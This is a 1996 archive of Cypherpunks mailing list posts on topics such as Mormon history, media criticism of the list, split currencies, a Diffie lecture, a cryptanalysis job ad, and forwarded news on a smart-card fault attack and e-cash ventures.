at a braindead "cyber-cafe" machine and want to read your mail.  The
problem is, mailmasher knows you POP password.

Anyway to do this more securely?

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Tue, 1 Oct 1996 03:57:53 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <324FD588.3FF2@gte.net>
Message-ID: <Pine.LNX.3.95.960930103159.21149B-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    Dale I wouldn't worry about the mountain and what is under it. It is
only genealogical stuff. Salt lake has to wait 100 years or 99 (i Forget)
in order to be able to make the records public. The SSA makes death info
available as soon as the body is cold. And that is on cd rom. Most banks
have contingency plans for having intact records in case of nuclear or
civil disturbance. Again it is under the mountains . 
   As for costs ,the full amount of the custodial costs are born by
members. Originally it was by donations of money and I think now it is
taken from the tithe. That is a sum in excess of 1 billion dollars by the
members.                                                                       
 
On Mon, 30 Sep 1996, Dale Thorn wrote:

> On the below: Gentiles (and Jews) are *very* afraid of Mormons.  Maybe 
> it has something to do with the World's Largest Database (on non-Mormons 
> especially) they keep under that mountain near SLC Utah.
> 
> Moroni wrote:
> > I never cease to be surprised by the interest that gentiles show  in
> > working mormon communities while totally neglecting their own failing
> > areas.
> 
> > On Sun, 29 Sep 1996, Timothy C. May wrote:
> > > (I received this message, with "cypherpunks@sybase.com" as well as
> > > "tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
> > > the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> > > going on.)
> 
> > > At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> > > >I guess that depends on your definition of liberty.  The Mormons
> > > >originally moved there to have a place to practice their religion,
> > > >and have freedom from persecution.  I suppose one could extend that
> > > >to wanting a place to have the freedom to have a set of rules consistant
> > > >with their beliefs.  Should that include freedom from interferance from
> > > >folks such as yourself who want to change their rules, even though
> > > >you're not presently effected?
> > >
> > > Well, if Utah can rig a way to _secede_ from the Union, your arguments
> > > would make more sense. But so long as they are part of these United States,
> > > their religious beliefs about when children should be at home cannot
> > > supersede basic liberties.
> 
> [additional text deleted]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 1 Oct 1996 06:24:09 +0800
To: cypherpunks@toad.com
Subject: Re: POLL RESULTS
In-Reply-To: <Pine.SUN.3.91.960930075945.10636B-100000@crl9.crl.com>
Message-ID: <v03007801ae75c417b652@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



While I didn't respond to Sandy's poll, for the obvious reason plus the
reason I use to almost never respond to polls, I'm not surprised at the
results. Most of us learn as children that "name calling" is rarely an
effective debating technique, and responding to such name calling even less
so.

(It may be that non-Americans, judging from several recent examples, are
not exposed to the "sticks and stones" meme, and assume childish
name-calling is effective debate.)

A few years ago, when Detweiler was unable to convince people about his
points by use of logic, he fell into this path, and ranted on and on for
several months, before finally either burning out or having enough accounts
yanked for abuse. I think not getting responses from me was what angered
him the most. Interesting that Detweiler returned with a _Russian_ nym.

Whether Vulis will burn himself out is unclear. Judging by his "spit" page,
http://206.124.65.1:80/netscum/, I rather imagine he has a years-long
supply of bile stored up. Must have been those cold Russian winters.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottb@aca.ca
Date: Tue, 1 Oct 1996 03:58:42 +0800
To: <cypherpunks@toad.com>
Subject: PRNG discussions
Message-ID: <96Sep30.110001edt.15713@gateway.aca.ca>
MIME-Version: 1.0
Content-Type: text/plain



Hi, I was wondering if anyone has kept an archive of old disscusions on 
PRNG's.  I am playing around with a few ideas, and don't want to re-invent 
the wheel.

Does anyone know of any FTP sites containg this sort of thing??

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Tue, 1 Oct 1996 05:09:01 +0800
To: cypherpunks@toad.com
Subject: ASAP letter on e-cash
Message-ID: <199609301455.KAA00838@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems our own Jim Ray has gotten published again, this time in Forbes ASAP's letters section ((Oct.7, page 18). A bit partisan-Libertarian, but good job, Jim.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "aaron sommer" <aaron@herringn.com>
Date: Tue, 1 Oct 1996 07:54:05 +0800
To: cypherpunks@toad.com
Subject: Re: Internet 'terrorism' newsclips  [CYPHER, but news]
Message-ID: <AE755DBE-D7B3DE@204.57.198.5>
MIME-Version: 1.0
Content-Type: text/plain


[article in Parade]

Love that in-depth technical reporting. 

>And from another piece of hard-hitting quote-the-official-source
journalism
>in PARADE, "A New Worry: Terrorism in Cyberspace"

[snip]

><SNIP>
>
>>There were more than 250,000 attacks on Department of Defense computers
>last 
>>year, and 65% were successful. Little is known about who launched them,
>why, or 
>>what they found. In a recent test, Defense Department "red teams" admit
to 
>>intentionally hacking into 18,200 systems, with only 5% of the attacks 
>>detected; only 27% of those attacks were reported.
>
>Wonder if the timing of these stories has anything to do with the end of
>term legislative push on wiretapping.

They're recycling an old USA Today piece. 

Turns out that figure was extrapolated by an internal investigation team 
trying to break into unclassified/non-secure systems. They just took the 
success rate for thier attacks and multiplied it by an arbitrary number 
to come up with an "annual" rate, according to the USA Today article. 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 1 Oct 1996 07:55:02 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: Katz on cypherpunks, in HotWired's Media Rant
In-Reply-To: <Pine.GSO.3.95.960930090407.3684I-100000@well.com>
Message-ID: <v03007800ae75cceb36a2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:06 AM -0700 9/30/96, Declan McCullagh wrote:
>[Background: the cypherpunk/pw:cypherpunk account used for HotWired's
>Threads discussion section has been used for anonymous flaming and
>attacks. --Declan]
>
>   Linkname: The Netizen - Media Rant - Jon Katz
>        URL: http://www.netizen.com/netizen/96/40/katz0a.html

Katz has no understanding of the difference between someone (or some bunch)
who use a name-password combination called "cypherpunks" with the
discussions on the _list_ called cypherpunks.

His comment, "Cypherpunks don't want real confrontations or discussions, or
they would reveal their identities and make it possible to respond, as most
flamers do. They are among media's rarest and at the same time most
easily recognized subspecies: nihilists." shows the same level of
sophistication as someone accusing Bill Clinton of misdeeds because
"whitehouse.gov" is used as a name/password for some forum.

Someone this naive (or this disingenous, if he knows better) has no
business writing for anything about the Net.

Once again, "Wired" and "HotWired" disgrace themselves.

--Tim May


>HotWired
>The Netizen
>30 Sep 96
>
>[...]
>
>      In addition, the digital culture has long been demonized by the
>            outside world and is inherently defensive and edgy.
>
>     Cypherpunks give us fascinating insights into this subject, since
>     their equivalent exists in no other medium, and they epitomize the
>    often mindless verbal violence that characterizes some parts of the
>   Net. Their original purpose - techno-anarchy and advocating unfettered
>   access to information - conflict head-on with the Web's mainstreaming
>              and the arrival of the newly wired middle class.
>
>     Cypherpunks don't want real confrontations or discussions, or they
>   would reveal their identities and make it possible to respond, as most
>    flamers do. They are among media's rarest and at the same time most
>                  easily recognized subspecies: nihilists.
>
>   Anonymous communication makes verbal violence easy. Since most flamers
>   don't know their targets and won't ever meet them, it's easy enough to
>     attack individuals and question personal motives, with none of the
>            social consequences of face-to-face verbal assaults.
>
>         And Net communication also offers no filter: because it's
>   instantaneous, people often don't take the time to cool off, reflect,
>          or take another look at the messages they mail and post.
>
>   When tempers flare here, it doesn't even take the time of a phone call
>    to pop off. So, hostile messages are often impulsive and frequently
>          regretted, apologized for, or taken back and clarified.
>
>      Since the Net makes communication so easy, it makes corrections,
>    criticism, and discussion inevitable. Nobody who writes or posts on
>     the Web should expect anything less than sustained and continuous
>       challenge and critique, something that is rarely permitted in
>    mainstream journalism. Web writers and posters have to see these as
>   integral to their work - not simply attacks - and as healthy antidotes
>                to conventional media arrogance and elitism.
>
>      Accompanying the hundreds and hundreds of personally assaultive
>   messages I've gotten - as opposed to the thousands of simply critical
>     ones - there is a strange and recurring phenomenon: If you respond
>       quickly and respectfully, the overwhelming majority of hostile
>   emailers either apologize, change their tone, or write back in a more
>      reflective, serious, or friendly way. Most of these posters are
>   stunned that anyone read their mail in the first place, or, even more
>                        amazingly, responded to it.
>
>[...]


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 1 Oct 1996 04:11:01 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: the theory of split currency
In-Reply-To: <v0300780fae75885ba0ff@[206.119.69.46]>
Message-ID: <199609301523.LAA15152@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



> Is there a name for a dual or split currency, in which
> there is one currency for domestic use and another, different
> appearing, currency for foreign usage?

I don't know of such a name, however...

> Does anyone know of any country which has had such a
> split currency?

...this has been a common situation, in fact. South Africa, China, the
Soviet Union, and other unpleasant places have repeatedly done
this. Its usually a remarkably stupid idea.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 05:57:13 +0800
To: cypherpunks@toad.com
Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics"
Message-ID: <v0300781bae759720195f@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


From: Rich Lethin <lethin@ai.mit.edu>
Date: Fri, 27 Sep 1996 15:06:20 -0400
To: rah@shipwright.com
Subject: [joei@hq.lcs.mit.edu: DLS -- the first one this year]




Date: Fri, 27 Sep 1996 14:34:24 -0400
To: seminars@lcs.mit.edu, help-teach@hq.lcs.mit.edu, eecsfaculty@eecs.mit.edu
From: joei@hq.lcs.mit.edu (Joei Juanita Marshall)
Subject: DLS -- the first one this year

DISTINGUISHED LECTURER SERIES

DATE:   October 17, 1996

TIME:    3:15 - Refreshments
         4:00 - Lecture

PLACE:  MIT, Building 34, Room 101, Vassar St., Cambridge, MA


"Cryptology, Technology, and Politics"

Dr. Whitfield Diffie
Distinguished Engineer
Sun Microsystems, Inc.
October 17, 1996

Abstract:

>From World War I on, interception of communications took its place beside
traditional human intelligence as a vital implement of state power.  Over
the past two decades, a combination of falling costs and new technologies
have made high-grade cryptography widely available. This threatens many
communications intelligence sources --- though probably not communications
intelligence itself. The result has been a series of panicky government
attempts to control the spread of cryptographic technology.  As long as
individuals have access to computers that really `work for them,' such
attempts are unlikely to succeed.  The opponents of cryptography may,
nonetheless, damage both our democracy and our economy with their efforts.

Host: Professor Michael Dertouzos


Joei Juanita Marshall
Massachusetts Institute of Technology
Laboratory for Computer Science
545 Technology Square
NE43-104
Cambridge, MA  02139

Phone: (617) 253-0145
Fax: (617) 258-8682

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Randall Terpstra <terpsrw@wabe.network.com>
Date: Tue, 1 Oct 1996 06:29:09 +0800
To: cypherpunks-errors <cypherpunks@toad.com>
Subject: RE: Looking for Qualified Individual/Firm to Contract forCrypt  analysis
Message-ID: <324FF9DB@mnbp.network.com>
MIME-Version: 1.0
Content-Type: text/plain



Nice try bimbo---  408 is San Jose!!

RWT

 ----------
From:  cypherpunks-errors[SMTP:cypherpunks-errors@toad.com]
Sent:  Saturday, September 28, 1996 3:58 PM
To:  cypherpunks
Subject:  Re: Looking for Qualified Individual/Firm to Contract   
forCryptanalysis

Julian Assange <proff@suburbia.net> writes:
> > I am looking for one or more people (or firms) who are qualified to
perform
> > world class cryptanalysis work.  Please send mail to me at
joswald1@msn.com
> > call in the U.S. at +1 408.479.7874
> >
> > Jack Oswald
> >
>
> Find your father's little black book under the couch?

Well, I dialed the number out of curisotity (it's in San Diego). The   
answering
machine says "This is Jack Oswald with R.P.K." Sounds gay.

 ---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013,   
14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 1 Oct 1996 08:10:30 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Utah as a Religious Police State
Message-ID: <9609301838.AA26264@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of people have pointed out what he was talking about,
one of which is below.  I haven't been able to find an article on
the web that does more than reference the event.  I'll try to hunt
up one of the books.  If anyone cares, I'll post what I find later.

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: mirele @ xmission.com ("Deana Holmes") @ smtp
Date: 09/30/96 06:53:41 AM
Subject: Re: Utah as a Religious Police State

On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote:

> Hmm...never heard that one before.  Care to produce
> a reference?
> 
> (Or am I supposed to be ignoring this guy when he
> makes ridiculous claims?)
> 
>     Ryan

I suspect that Dmitri is referring to the Mountain Meadows Massacre.  
It's not a pretty story and is one of the low points of Mormon 
history.

The late historian Juanita Brooks wrote about the masscre, and about 
the leader, John D. Lee, in a couple of books.  

> ---------- Previous Message ----------
> To: cypherpunks
> cc: 
> From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp
> Date: 09/29/96 05:54:09 PM
> Subject: Re: Utah as a Religious Police State
> 
> Ryan Russell/SYBASE writes:
> > I guess that depends on your definition of liberty.  The Mormons
> > originally moved there to have a place to practice their religion,
> > and have freedom from persecution.  I suppose one could extend that
> > to wanting a place to have the freedom to have a set of rules consistant
> > with their beliefs.  Should that include freedom from interferance from
> > folks such as yourself who want to change their rules, even though
> > you're not presently effected?
> 
> It's worth noting that one of Utah mormons favorite pastimes was to ambush
> the settlers heading for California, kill them all, and take their property.
> However the mormons were dealt with much less severely than the local Indians
> who tried the same tricks. Pity.
===end vulis rant===

Deana 



Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@acm.org>
Date: Tue, 1 Oct 1996 06:28:35 +0800
To: cypherpunks@toad.com
Subject: RE: Looking for Qualified Individual/Firm to Contract for    Cryptanalysis
Message-ID: <2.2.32.19960930161624.006f43b0@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:00 AM 9/30/96 -0700, thad@hammerhead.com (Thaddeus J. Beier) wrote:
>
>I saw this
>
>> > I am looking for one or more people (or firms) who are qualified to perform
>> > world class cryptanalysis work. Please send mail to me at joswald1@msn.com
>> > call in the U.S. at +1 408.479.7874
>> >
>> > Jack Oswald
>
>and then this...
>
[news about Grady Ward, and the Scientology cult's attempt to decrypt his files]
>
>The trial is happening in San Jose, and I wouldn't be at all surprised
>if the attempted cryptanalysis is happening there, too.  They've been
>working at it for a few months now.

Not necessarily.  The answering machine at the phone number listed mentions
"RPK" as the company, and this company has non-Grady reasons for looking for
these skills.

>From their web page at http://crypto.swdev.co.nz/:
"The RPK public key cryptosystem provides industrial-strength public key
cryptography that's available worldwide. "

"You'll find full technical information, free evaluation software and
development tools, and details of our SafeCracker Challenge program where you
can earn a $$$ REWARD $$$ while trying to put us out of business! "

They could just be looking for people to test their own stuff.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 1 Oct 1996 07:49:15 +0800
To: cypherpunks@toad.com
Subject: Re: active practice in America
In-Reply-To: <199609301839.LAA05232@dfw-ix11.ix.netcom.com>
Message-ID: <v03007801ae75df4c8833@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 PM -0400 9/30/96, Marc J. Wohler wrote:
>At 08:45 AM 9/30/96 -0800, you wrote:

>>
>>(Legal purists will point out that the second trial was for "Federal civil
>>rights violations." Harummphh. What would the Founders think of this logic:
>
>I am sure you know the reason for the 'civil rights violation laws.
>
>In the 50's & early 60's, all while jury's in the deep south refusing to
>convict obviously guilty white defendants of rape and  murder against blacks.
>
>What would be *your* remedy in such cases.

Certainly not throwing out the principle of double jeopardy, that a man
should only be tried once for the same alleged crime. As for my "remedy,"
not all injustices can be righted.

(The O.J. trial was a case of a mostly-black jury refusing to convict an
obviously guilty black defendant....and yet I don't hear calls for a
_second_ criminal trial.)

As for the historical reasons for the "conspiracy to not take seriously the
civil rights of an aggrieved minority" nonsense, isn't it about time to
roll back such laws? Whatever the putative justification for such things
might have been 30-40 years ago, this is now, that was then.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 1 Oct 1996 11:33:57 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <8LV3uD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times: Thursday, September 26, 1996

Potential Flaw Seen In Cash Card Security

By John Markoff

A potential security flaw has been discovered that might make it possible to
counterfeit many types of the electronic-cash ``smart cards'' that are now
widely used in Europe and are being tested in this country by banks and
credit card companies - including Visa and Mastercard.

The types of smart cards that are potentially at risk include the kinds
already employed in the Mondex cash card system and others used by European
consumers.

A cash card from Visa International Inc. was demonstrated in a highly
publicized trial at last summer's Olympic Games in Atlanta. Chase Manhattan
Corp.; Citibank, a unit of Citicorp, Mastercard International Inc., and Visa
plan a test this year with 50,000 customers in New York City.

Touted as the key to the cashless society of the near future, smart cards
are credit card-sized packets that contain a microprocessor chip and a small
amount of computer memory for storing bits of electronic information that
represent money. At businesses equipped with the computerized devices that
accept smart-card payments, the cards are supposed to be as good as cash -
and as vulnerable to theft or loss as a $100 bill.

But the cards have been promoted as tamper-proof, which is why computer
scientists at Bell Communications Research, one of the nation's leading
information-technology laboratories, are now sounding the alarm, saying that
a sophisticated criminal might be able to tweak a smart-card chip to make a
counterfeit copy of the monetary value on a legitimate card.

``If you're deploying these smart-card devices in a business or government
electronic-payment system, then I think you need to look carefully at their
actual security,'' said Richard Lipton, chief scientist at Bell
Communications and a professor of computer science at Princeton University.

Lipton and two colleagues at Bell Communications Research - or Bellcore -
are about to publish a research paper on the potential smart-card flaw,
which they recently discovered through theoretical research on the
technology. No smart-card counterfeiting has been discovered yet, but Lipton
and his team believe that such crimes are inevitable unless the technology
is redesigned. The researchers have also been quietly notifiying the seven
regional Bell telephone companies that jointly own Bellcore about their
discovery. Bell companies including US West, and long-distance companies,
including AT&T Corp., have been planning to market smart cards as a secure
way to pay for long-distance calls without entering credit card numbers or
generating the audit-trail of a phone bill.

Despite the Bellcore warning, not all executives at companies using smart
cards consider the theoretical threat a real danger.

``This is very speculative,'' said Chris Jarman, vice president of chip card
technology at Mastercard, who had seen a draft of the Bellcore research
paper. ``I have yet to see a smart-card scheme with a vulnerability,''
Jarman said.

And even some industry executives, who said it was conceivable that
individual smart cards might be at risk, contended that the vulnerability
was not a threat to smart-card technology in general - any more than the
occasional passing of a counterfeit $20 bill undermines the U.S. currency
system.

``This is a significant event but it doesn't blow the industry apart,'' said
William Barr, vice president of the Smart Card Forum, a trade organization
of 230 U.S. companies and government agencies. Still, Barr conceded, ``this
approach offers some ability to mount attacks that have not been
anticipated.''

The Bellcore researchers, however, consider the potential flaw significant
because it could short-circuit the data-scrambling software contained in
many types of smart cards. The software is used to protect the card's secret
code, which is designed to prevent counterfeiting.

In theory, at least, the Bellcore researchers said that a smart card's
security could be breached by forcing the microchip in the card to make a
calculation error. This could be done in a number of ways, the researchers
said, whether through sophisticated means like bombarding the card with
radiation or perhaps cruder methods like placing it in a microwave oven.

Once the card can be forced to make even a small calculating error, the
researchers said that a mathematical formula they derived could use this
error to extrapolate the secret data that authenticates the card when it is
inserted in a merchant's card reader.

The researchers suggested that in any system where it was possible to know
about a calculation error it might be possible to exploit this newly
discovered vulnerability. The Bellcore team is conducting further research
into this possibility.

``These systems tend to have a fragile behavior,'' said another of the
researchers, Richard A. DeMillo, who is vice president for information
technology at Bellcore. ``Our technique is like tiny lever that makes it
possible to pry open the vault that the secret information is stored in.''



U. S. Banker: Thursday, September 26, 1996

Mondex gets Cold, Hard Cash

By Joseph Radigan

The $ 119 million that National Westminster Bank plc and Midland bank plc
raised this summer to fund their Mondex smart card program should provide at
least some the capital they'll need to increase its acceptance.

The capital was raised in conjunction with Mondex's spinoff from the two
British banks that created the program as a joint venture five years ago.
The new setup is being called "Mondex International," and besides NatWest
and midland, which now hold minority stakes, it includes 15 other
shareholding banks. One of them is Hongkong and Shanghai Banking Corp.,
which like Midland is owned by HSBC Group of London. In the U.S., Wells
Fargo & Co. and AT&T Corp.'s Universal Card Services Group paid a combined $
46.5 million for their 30% stake. The other investors include major banks in
Canada, australia and New Zealand. Another 23.5% remains to be sold for
roughly $ 1.5 million for each 1% interest.

Not all the new funds are going toward Mondex's future development. Some
will be used to compensate NatWest for the costs it incurred in leading the
original research and development.

NatWest's Michael Keegan became Mondex's chief executive as part of the
restructuring, replacing Tim Jones, a fellow NatWest executive who had been
Mondex's CEO through its startup phase. Jones is returning to NatWest as the
managing director for the London bank's electronic commerce group and will
keep a seat on the card association's board.

David Mills, who runs Midland Bank's retail banking business will stay on as
chairman of Mondex International, but he also has a seat on the board of
MasterCard's European affiliate, Europay. These two card associations, in
conjunction with Visa, are backing a smart card program that rivals
Mondex's. But Keegan says that this does not pose a conflict of interest. As
in the American credit card business, where banks are free to issue both
MasterCard and Visa, Keegan foresees a future in which Mondex members will
issue both Mondex and Europay smart cards.

Now that Mondex is in the process of collecting the financial fuel it will
need to fund its growth, the smart card organization's future revenue will
come mostly from annual dues paid by member banks, Keegan says. The
per-transaction interchange fee that supplies MasterCard and Visa with most
of their annual revenue is not practical for the low-value payments for
which smart cards are intended. Imposing a transaction fee on these would
make the system impractical. In addition, because Mondex attempts to
electronically mimic currency, most transactions will not settle through a
captive payments clearing system. The only settlement will take place on an
end-of-day basis when merchants or customers redeem their Mondex value at
their local banks.



San Francisco Chronicle: Thursday, September 26, 1996

Hundreds of Companies Have Smart Card Systems

By Laura Castaneda

The smart money is on smart cards -- even though most consumers have yet to
lay a finger on them.

Valerie Baptiste is one exception. The Wells Fargo secretary is
participating in a company experiment that lets her make purchases at 22 San
Francisco shops with a smart card.

Resembling credit cards, smart cards are embedded with computer chips. They
can store cash and other data such as medical history and credit
information.

''A big advantage is the convenience of not having to fumble around in my
purse for cash,'' said Baptiste as she was buying juice at The Wildflower
Cafe.

Hundreds of companies besides Wells Fargo, including several in the Bay
Area, have launched smart card pilot programs to try and cash in on the
cashless society of the future.

Getting merchants and customers to accept and use a new form of payment
won't happen overnight. But experts believe the widespread acceptance of
smart cards is inevitable.


''I'm confident that the push will be on to make it happen because there are
so many powerful entities interested in seeing cash go away,'' said Bruce
Brittain of Brittain Associates in Atlanta, a consumer behavior research
firm.

David Poe, a director of Edgar Dunn & Co. in San Francisco, a management
consulting firm that specializes in new product development, agreed. ''I
think (smart card use) is going to be evolutionary as opposed to
revolutionary,'' he said.

Entities that want to cut down on the use of cash include big banks, credit
card issuers, universities and the U.S. government. Why? Smart cards can
save the cost of collecting, counting, securing and transferring cash.

Most pilot programs feature smart cards that simply store cash, usually up
to $ 20. The amount of each purchase is electronically deducted from the
card at the point-of-sale.

These kinds of smart cards are ideal for smaller transactions like parking,
lunches, dry cleaning, convenience stores, vending machines and fast food.

However, smart card technology is almost limitless. Combining computer chips
and magnetic stripes allows a single card to be used as a cash, credit,
debit and ATM card.

Among the pilot programs in place:

* Bank of America and Visa International are experimenting with
employee-only stored value smart cards for purchases from company cafeterias
and vending machines and some outside merchants.

* Ohio and Wyoming plan to start using smart cards for food stamp and
nutrition programs, and the U.S. Department of Defense is testing a
multiapplication smart card at military bases in Hawaii.

* The Washington, D.C., transit system plans to implement smart card
technology for fares, and the Metropolitan Transit Commission, which serves
25 Bay Area transit services, is also considering launching smart card
technology in about two years.

* The University of Michigan, Western Michigan University, Washington
University, the University of Minnesota, the University of North Carolina,
Florida University and the University of San Francisco have smart cards for
on- and off-campus in cafeterias, bookstores and restaurants.

Smart cards are already widely used overseas. In Germany, more than 80
million people have been issued smart cards containing health insurance
information.

The potential market is huge, with more than half a billion smart cards
expected to be in use worldwide by the year 2000, according to the Smart
Card Forum, a group dedicated to accelerating the widespread acceptance of
smart cards.

A Smart Card Forum poll found that almost two-thirds of respondents see
smart cards as a convenient option for carrying important personal
information, and 40 percent would prefer to use the cards instead of cash
for everyday purchases.

Another Smart Card Forum survey found that retailers see various benefits
such as gathering customer information, offering loyalty or ''frequent
shopper'' programs and electronic ticketing and couponing.

Despite high expectations, smart cards have a long way to go before they
become as popular as ATM cards.

Critics of smart cards, worried about privacy issues, liken the card's
ability to track a consumer's every purchase to Big Brother in George
Orwell's novel ''1984.''

There is also the classic ''chicken and egg'' problem: Merchants don't want
to spend the money for smart card equipment until they're in widespread use,
while consumers don't want to use smart cards until more merchants accept
them.

''It's going to be a tough sell for consumers,'' said Rob Palmer, owner of
The Wildflower Cafe, which has participated in the Wells Fargo pilot program
for about a year. ''Cash is very convenient.''

Palmer agreed to participate in the experiment because it was free. But he
said it may not be worth paying for later because smart card business only
accounts for about 2 percent of his transactions.

It costs about $ 500 per unit for a point-of-service terminal capable of
processing smart cards. It's unclear whether banks or merchants will
ultimately foot the bill. Many new debit and credit card terminals are also
incorporating smart-card capabilities.

The Smart Card Forum estimates that it costs 80 cents to $ 15 to manufacture
a card, depending on the size of the chip. Right now, banks and card issuers
are paying for the cards.

Eventually retailers could sell their own affinity cards.

Today, some cards can only be used once, others can be reloaded with more
cash. To be cost-effective, though, most people think they cards will have
to be reloadable and have more than one use.

To succeed, smart cards will have to offer clear benefits to merchants (such
as loyalty programs that generate repeat business) and to consumers (such as
discounts or special promotions).

The cash-only cards do not have any security features, so if you lose one,
it's easy for someone else to spend your money.

Cards that also have personal information will need to have security
features such as ''encryption,'' or electronic scrambling that protect
against unauthorized use.

In fact, a survey of the world's 10 largest central banks released earlier
this month by a task force of computer and security experts found that
security measures now used with electronic money are adequate to protect
consumers from fraud.

Companies are also starting to look at other smart card applications.

Microsoft Corp. is working with several other companies to develop open
standards that integrate smart cards with computers, so that you could
transfer money from your checking account onto a smart card using your PC.

The smart cards also could be used make purchases over the Internet. Many
people are afraid to use credit cards to buy things over the Internet
because they're afraid their account numbers will get stolen.

Yesterday, Mondex International Ltd. and CyberCash, Inc. announced an
agreement to produce smart cards that will let consumers purchase goods over
the Internet and download and transfer funds.

In 1998 Wells Fargo plans to roll out a multipurpose card made by Mondex
that will let people transfer money from their accounts to smart cards via
computer.

Such smart card technology will be like ''having an ATM in your own home,''
said Janet Hartung Crane, senior vice president for Wells Fargo.



American Banker: Thursday, September 26, 1996

Checkfree Sees On-Line Banking Tripling in 1997

By JENNIFER KINGSON BLOOM

Peter J. Kight, chief executive officer of Checkfree Corp., makes two
predictions about on-line banking.

He says that 1996 will be remembered as the year banks learned the power of
the technology, and that the number of consumers banking through electronic
channels will more than triple in 1997.

The statements carry more weight than they would have a year ago, because
Mr. Kight's company has transformed itself into a formidable force in the
interactive banking market.

Once known primarily as a processor of electronic bill payments, Checkfree
has acquired four companies this year, giving it a soup-to-nuts line of
electronic banking products and services. Behind the acquisitions lies Mr.
Kight's vision of banking's future. "Every major bank in the country will be
in the market with an electronic banking product within the next 18 months,"
Mr. Kight said. "It's following exactly the same curve as credit cards."

For Mr. Kight, these developments represent the culmination of 15 years of
hard work.

Just last week, Checkfree announced an agreement to acquire the processing
subsidiary of Intuit Inc., which will give it access to the latter company's
Quicken product, its customers, and bank partners.

"This is what I paid my dues for," Mr. Kight said. "This is what we built
the company to do."

On Wednesday, Checkfree announced partnerships with BellSouth, Capstead
Mortgage Co., and the Small Business Administration. The arrangements will
let the companies and the agency collect bill payments electronically.

Mr. Kight founded Columbus, Ohio-based Checkfree in 1981, when he was 24.
